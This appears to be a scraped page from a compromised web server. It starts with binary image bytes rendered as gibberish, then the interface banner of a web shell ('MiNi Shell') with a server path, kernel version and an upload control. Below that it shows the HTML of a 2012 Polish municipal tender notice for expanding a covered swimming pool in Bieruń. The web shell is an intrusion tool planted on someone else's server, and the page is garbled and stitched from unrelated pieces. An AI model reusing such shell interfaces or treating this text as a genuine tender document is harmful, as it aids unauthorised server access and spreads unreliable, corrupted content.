JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121015/218725-N-2012.html

<p class="kh_header"><b>Bieruń: Budowa zaplecza rekreacyjnego krytej pływalni w Bieruniu Starym</b><br>
<b>Numer ogłoszenia: 218725 - 2012; data zamieszczenia: 15.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zaplecza rekreacyjnego krytej pływalni w Bieruniu Starym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, sanitarne i elektryczne związane z rozbudową          i nadbudową części krytej pływalni przy Szkole Podstawowej nr 1 w Bieruniu o zaplecze rekreacyjne , zjeżdżalnię oraz remont elewacji.
 Zaprojektowano modernizację części wejściowej do pływalni poprzez nadbudowę tarasu nad poczekalnią wraz z zagospodarowaniem go na cele rekreacyjne i odnowy biologicznej, a na parterze włączenie części poczekalni do sali basenowej. 
Przebudowa części poczekalni polegać ma  na połączeniu z salą basenową i umieszczeniu na nowej powierzchni wanny jaccuzi, hamowni płytkiej dla zjeżdżalni dziecięcej oraz klatki schodowej stalowej do wejścia na I piętro rekreacyjne i do zjeżdżalni.
 Przebudowie ulegną pomieszczenia piwnic w celu zmodernizowania technologii obsługi basenu, w tym:
rozdzielni energetycznej, stacji trafo wraz z zabudową urządzenia UPS i lampy do dezynfekcji wody.
 Na I piętrze poprzez zabudowę istniejącego tarasu wykonane zostaną pomieszczenie rekreacji tj. sauny sucha i mokra, pomieszczenie wypoczynku z elementami ścian solnych wraz z natryskami oraz szatniami. 
Na zewnątrz zaprojektowano zjeżdżalnię rurową w podwójnej obudowie, ocieploną.
Odprowadzenie wód deszczowych z dachu zaprojektowano w systemie podciśnieniowym Geberit Pluvia 
z zastosowaniem podgrzewanych wpustów dachowych .
Przewidziano przebudowę zewnętrznej kanalizacji deszczowej, modernizację kotłowni gazowej, wymianę sieci ciepłowniczej i  renowację elewacji zewnętrznej istniejącego  budynku basenu .
Zmianie ulegnie zadaszenie nad wejściem  oraz zostanie wyremontowana pochylnia dla osób niepełnosprawnych.
Modernizacja kotłowni przewiduje wymianę większości zużytych urządzeń. Zaprojektowano układ źródła ciepła o łącznej mocy 990kW. 
Wymiana sieci ciepłowniczej polegać będzie na ułożeniu nowej nitki sieci cieplnej  od przebudowywanej kotłowni w  budynku szkoły do budynku pływalni krytej .
Przebudować należy również kolidującą linię kablową średniego i niskiego napięcia, rozbudować wewnętrzną instalację elektryczną, układ pomiarowy, ułożyć instalacje słaboprądowe, kontroli dostępu, nagłośnienia i monitoringu.
Przewidziano również nasadzenie drzew i krzewów.

Zestawienie danych dla  modernizowanych pomieszczeń:
-	Kubatura nadbudowy -				780,00 m3
-	Kubatura całego obiektu-	    		        10300,96 m3
-	Powierzchnia użytkowa nadbudowy -		205,80 m2
-	Powierzchnia użytkowa  budynku basenu-            2450,40 m2

Zestawienie danych dla pomieszczeń rekreacyjnych:
-	kabina sauny suchej - 	ok.11 m2; 
-	łaźnia parowa - 		ok.11 m2, 
-	zespół natrysków, balia	ok. 8,30 m2
-	wypoczywalnia z elementami komnaty  solnej- 38,00 m2
-	wanna spa do hydromasażu- pow. lustra wody ok.4 m2  wykonana z akrylu sanitarnego wzmocnionego włóknem szklanym
-	dwa pomieszczenia szatni wraz z węzłami sanitarnymi o pow. ok.20,1 m2
-	zjeżdżalnia O 1000 mm z hamownią ,
-	jaccuzi, hamowni płytkiej dla zjeżdżalni dziecięcej o łącznej  pow. ok.96,8 m2 oraz klatki schodowej łączącej parter z piętrem o pow. 15 m2,.

Szczegółowy opis przedmiotu zamówienia zawarty jest w następujących opracowaniach: 
1.	Projekt Wykonawczy ARCHITEKTURA.
2.	Projekt Wykonawczy RYSUNKI KONSTRUKCYJNE.
3.	Projekt Wykonawczy ZJEŻDŻALNIA WODNA.
4.	Projekt Wykonawczy INSTALACJE SANITARNE - Instalacje wewnętrzne  wod-kan .
5.	Projekt Wykonawczy INSTALACJE SANITARNE - Przebudowa zewnętrznej kanalizacji deszczowej.
6.	Projekt Wykonawczy INSTALACJE SANITARNE-instalacje grzewcze.
7.	Projekt Wykonawczy INSTALACJE SANITARNE-Instalacja wentylacji mechanicznej.
8.	Projekt Wykonawczy INSTALACJE SANITARNE-Instalacja technologii uzdatniania wody kąpielowej.
9.	Projekt Wykonawczy INSTALACJE SANITARNE:
cz. 1. Wymiana urządzeń wraz z dostosowaniem instalacji i remont pomieszczenia kotłowni;
cz. 2. Wymiana istniejącego  przyłącza cieplnego łączącego istniejące budynki szkoły i basenu;
10.	Projekt Wykonawczy INSTALACJE ELEKTRYCZNE - Przebudowa linii kablowej NN i ŚN.
11.	Projekt Wykonawczy INSTALACJE ELEKTRYCZNE- Rozbudowa instalacji i urządzeń elektrycznych pływalni.
12.	Projekt Wykonawczy INSTALACJE ELEKTRYCZNE - Instalacje i urządzenia słaboprądowe, kontroli dostępu nagłaśniania i monitoringu.
13.	Projekt Wykonawczy INSTALACJE ELEKTRYCZNE - Półpośredni układ rozliczeniowy energii elektrycznej.
14.	Specyfikacja Techniczna Wykonania i Odbioru Robót.
15.	Przedmiary robót:
Nr1/06 2012 -Roboty Budowlane  - zawiera przedmiary robót odpowiadające zakresowi opracowań z PW (1)ARCHITEKTURA,(2) KONSTRUKCJE,(3) ZJEŻDŻALNIA.
Nr 4/06/2012 -   Instalacja wod-kan
Nr 5/06/2012 -  Przebudowa kanalizacji deszczowej
Nr 6/06/2012 -  Instalacja grzewcza 
Nr 7/06/2012 -   Instalacja wentylacji mechanicznej
Nr 8/06/2012  -  Instalacja technologii uzdatniania wody kąpielowej
Nr 9/06/2012  -  Wymiana urządzeń wraz z dostosowaniem instalacji i remont pomieszczenia  
                          kotłowni i wymiana przyłącza cieplnego
Nr 10/06/2012 - Przebudowa linii kablowej NN i ŚN
Nr 11/06/2012 - Instalacja elektryczna
Nr 12/06/2012 - Instalacja słaboprądowa
Nr 13/06/2012 - Półpośredni układ rozliczeniowy.


W wyniku realizacji zamówienia zamawiający ma uzyskać przedmiot w stanie kompletnym, gotowym  do użytkowania o wysokiej jakości robót i wysokiej jakości zastosowanych materiałów.
Wykonawca, dodatkowo, w ramach realizacji przedmiotu zamówienia i w ramach zaoferowanej ceny: 
-	dostarczy wszelkie wyposażenie, materiały eksploatacyjne, sprzęt  niezbędny do prawidłowego użytkowania, z tym że  materiały eksploatacyjne chemii basenowej winny wystarczyć na okres co najmniej jednego miesiąca, a materiały eksploatacyjne dla wentylacji winny wystarczyć dla co najmniej jednego pełnego przeglądu serwisowego,
-	wykonawca zastosuje do realizacji przedmiotu zamówienia tylko fabrycznie nowe materiały, urządzenia oraz wyposażenie  przy przygotowaniu oferty i realizacji,
-	przeprowadzi wszelkie: próby, badania, odbiory urzędowe przewidziane przepisami,
-	przeprowadzi  lub opłaci przeprowadzenie wszelkich szkoleń, instruktaży dla pracowników obsługi zamawiającego, 
-	sporządzi i dostarczy zamawiającemu odpowiednie instrukcje obsługi np. basenu, wentylacji, i inne według potrzeb zgłoszonych przez zamawiającego, a wynikających z zamówienia,
-	opracuje projekt organizacji robót z planem BIOZ i przedstawi go Zamawiającemu do uzgodnienia,
-	przekaże: projekt powykonawczy (część opisowa, część rysunkowa),  wszelkie atesty na materiały 
i urządzenia (2 egzemplarze w wersji papierowej oraz wersja elektroniczna edytowalna oraz w plikach Adobe Reader),
-	przekaże dokumentację fotograficzną zakresu robót - wersja elektroniczna,
-	wykonawca winien uwzględnić specyfikę pracy w czynnych obiektach oświatowych  min. zastosuje się do ograniczenia wykonywania głośnych prac remontowych w czasie lekcji,
-	 zorganizuje własne zaplecze na potrzeby budowy w miejscu uzgodnionym z Zamawiającym,
-	pokryje koszty zużycia wody, energii elektrycznej, cieplnej na postawie zamontowanych na swój koszt urządzeń pomiarowych,
-	pokryje koszty rozruchu technologicznego,
-	pokryje koszty wykonania i uzyskania świadectwa charakterystyki energetycznej obiektu,
-	uzyska w imieniu zamawiającego pozwolenie na użytkowanie w umownym terminie zakończenia przedmiotu umowy, 
-	wykona pomiary geodezyjne dla realizacji robót oraz powykonawcze pomiary geodezyjne 
z naniesieniem wyników pomiarów do miejskich zasobów geodezyjnych, z podaniem numeru KERG oraz dostarczeniem zaktualizowanej mapy zasadniczej w skali 1:500.
Jeżeli w dokumentacji technicznej, specyfikacji technicznej wykonania i odbioru robót oraz SIWZ
określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i art.7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego lub wyższego poziomu jakościowego, technologicznego i estetycznego, określonych w SIWZ i STWOiR.
Zabudowane i dostarczone materiały budowlane muszą posiadać wszystkie wymagane Prawem
budowlanym i polskimi normami, przenoszącymi zharmonizowane normy europejskie, atesty,
certyfikaty i aprobaty techniczne. 
Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, zaliczek na poczet wykonania
zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów
w rozumieniu ustawy oraz stosowania wymagań określonych w art.29 ust.4 ustawy.
Zamawiający nie dopuszcza składania ofert częściowych , wariantowych.
Odpowiedzialność wykonawcy z tytułu gwarancji za wady w odniesieniu do całego przedmiotu umowy łącznie z urządzeniami wynosi 36 miesięcy, licząc od daty odbioru przedmiotu umowy.
Wymagany termin zakończenia zadania wynika z podpisanej umowy o dofinansowanie w ramach RPO Województwa Śląskiego, zawartej pomiędzy Gminą Bieruń i Województwem Śląskim.

Projekt współfinansowany w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet IX Zdrowie i rekreacja Działanie 9.3 Lokalna infrastruktura sportowa.

Nazwy i kody według słownika CPV:
 kod CPV: 45.00.00.00-7 - nazwa: Roboty budowlane
dodatkowe przedmioty: 
kod CPV :45.21.22.12-5 Roboty w zakresie basenów pływackich
kod CPV: 45.26.24.20-1 Wznoszenie konstrukcji obiektów
kod CPV: 45.21.00.00-2  Roboty budowlane w zakresie budynków
kod CPV: 45.40.00.00-1  Roboty wykończeniowe w zakresie obiektów budowlanych
kod CPV: 45.31.00.00-3  Roboty instalacyjne elektryczne
kod CPV: 45.23.22.00-4  Roboty montażowe, sieć NN,ŚN
kod CPV: 45.11.12.00-0  Roboty ziemne
kod CPV: 45.33.00.00-9  Roboty instalacyjne wodno-kanalizacyjne i sanitarne
kod CPV: 45.33.11.00-7  Instalowanie centralnego ogrzewania
kod CPV: 45.33.12.00-8  Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych
kod CPV: 45.45.30.00-7  Roboty remontowe i renowacyjne
kod CPV: 45.44.30.00-4  Roboty elewacyjne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.22.12-5, 45.26.24.20-1, 45.21.00.00-2, 45.40.00.00-1, 45.31.00.00-3, 45.23.22.00-4, 45.11.12.00-0, 45.33.00.00-9, 45.33.11.00-7, 45.33.12.00-8, 45.45.30.00-7, 45.44.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości  100 000,00 zł ( słownie: stotysięcyzłotych 00/100) musi być wniesione                         w terminie, który został podany w punkcie Terminy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego.
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją:
Wadium - nr sprawy: ZP.271.55.2012 Przetarg nieograniczony na wybór wykonawcy zamówienia  pn. Budowa zaplecza rekreacyjnego krytej pływalni  w Bieruniu Starym.
Określenie - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium ,wpłaconego przelewem, na rachunku zamawiającego.
Termin - wniesienie wadium w pieniądzu - oznacza uznanie kwoty wadium, wpłaconego przelewem, na rachunku zamawiającego nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 10:00 w dniu wyznaczonym do składania ofert. Termin ważności wadium wniesionego w innej formie niż pieniądz musi obejmować okres nie krótszy niż termin związania ofertą tj. nieprzerwanie obejmujący okres 30 dni włącznie z dniem wyznaczonym do składania ofert.
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)	w gwarancjach ubezpieczeniowych,
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz.1158                 z późniejszymi zmianami).
Jeżeli powyższe dokumenty wystawione są w języku obcym, należy przedłożyć je wraz                      z tłumaczeniem na język polski.
W przypadku wniesienia wadium przez wykonawców wspólnie ubiegających się                               o udzielenie nin. zamówienia, należy wskazać wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                         z art. 24 ust. 2 pkt 2 ustawy pzp, a jego oferta zostanie uznana za odrzuconą.
2. Zasady zwrotu wadium
Wadium wniesione w pieniądzu zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy pzp wraz                      z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1)	Zgodnie z art. 46 ust.1 ustawy pzp, zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem  wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a.
2)	Wykonawcy którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3)	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4)	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podst. art. 46 ust.1 ustawy pzp , jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. Wadium zostanie wniesione w terminie określonym przez zamawiającego
3. Utrata wadium
Zgodnie z zastrzeżeniem art.46 ust.4a ustawy pzp zamawiający zatrzymuje wadium wraz                                  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Ponadto zgodnie z art.46 ust.5 ustawy pzp zamawiający zatrzymuje wadium wraz z odsetkami, jeżeliby wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                    w ofercie;
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)  zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają   
 obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali zgodnie ze sztuką budowlaną i prawidłowo ukończyli w okresie ostatnich pięciu lat przed 
     upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - to w tym okresie 
     roboty budowlane w zakresie budowy, przebudowy, odbudowy lub  remontu obiektu kubaturowego 
     ( np. kryta pływalnia, kryte lodowisko, hala sportowa)  o łącznej wartości brutto min.  6 000 000,00 zł, 
     w tym jednego obiektu kubaturowego o wartości brutto min.4 000 000,00 zł.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp),
     - wykazu wykonanych robót w zakresie budowy, przebudowy, odbudowy lub remontu obiektu kubaturowego( np.krytej pływalni, krytego lodowiska, hali sportowej) o łącznej  wartości brutto min. 6 000 000,00 zł, w tym jednego obiektu o wartości brutto min.4 000 000,00 zł z podaniem  ich rodzaju
         i wartości, daty  i miejsca  wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie  z  zasadami sztuki budowlanej i prawidłowo ukończone (np.referencji, protokołów końcowych odbioru robót).
Przez wykonali należy rozumieć, że roboty  zostały zakończone i odebrane protokołami 	 końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert, a jeżeli okres jest krótszy - w tym okresie. 
Warunek wykonania robót jest spełniony również w przypadku wykonania jednej roboty  ww. zakresie o wartości min. 6 000 000,00 zł brutto.
     W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena warunku nastąpi 
      łącznie tzn. należy wykazać, że warunek wykonania jednego obiektu kubaturowego o wartości  brutto  
      min.4 000 000,00 zł. spełnia  przynajmniej jeden z wykonawców , a łącznie (wykonawcy wspólnie 
      ubiegający się o udzielenie zamówienia)  wykonali  wymagane roboty o wartości brutto co najmniej 
      6 000 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
przedłożonego  przez wykonawcę:
   - oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami     
ogólnobudowlanymi bez ograniczeń, która będzie uczestniczyć w wykonaniu zamówienia.

Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
     przedłożonego przez wykonawcę:

-	oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
-	wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności                                             odpowiedzialnych za  kierowanie robotami budowlanymi (uprawnienia budowlane bez ograniczeń), wraz  z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.  
   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  wykazać, 
   że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
    przedłożonego przez wykonawcę :
 oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

